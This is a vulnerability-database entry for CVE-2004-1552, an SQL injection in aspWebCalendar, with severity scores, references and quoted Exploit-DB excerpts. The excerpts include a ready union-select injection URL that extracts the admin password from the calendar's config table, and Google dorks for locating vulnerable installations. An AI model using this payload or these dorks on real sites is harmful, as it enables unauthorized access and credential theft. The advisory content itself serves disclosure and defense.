CVE-2004-1552
Published 2004-12-31
CVE-2004-1552: SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2)…
Priority: P340 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 4.08% (89.4th percentile)
SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the eventid parameter to calendar.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| full_revolution | aspwebcalendar | — | — |
No detection rules found.
Exploit-DB
Web Calendar System 3.12/3.30 - Multiple Vulnerabilities
exploitdb·2008-11-27
---
[+] Script : Web Calendar System v 3.12/3.30
[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit)
[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp
[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp
[+] Contact : [email protected]
--//--> Exploit :
1) Remote Bypa
Exploit-DB
AspWebCalendar 4.5 - 'eventid' SQL Injection
exploitdb·2007-03-22
---
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]
Example:
/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config
"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron
"""""""""""""""""""""
www.p4r4d0x.com
# milw0rm.com [2007-03-22]
No writeups or analysis indexed.
References:
http://marc.info/?l=bugtraq&m=109604910025090&w=2
http://secunia.com/advisories/12651
http://secunia.com/advisories/24622
http://www.securityfocus.com/bid/11246
http://www.securityfocus.com/bid/23098
http://www.vupen.com/english/advisories/2007/1093
https://exchange.xforce.ibmcloud.com/vulnerabilities/17506
https://exchange.xforce.ibmcloud.com/vulnerabilities/33157
https://www.exploit-db.com/exploits/3546
Published: 2004-12-31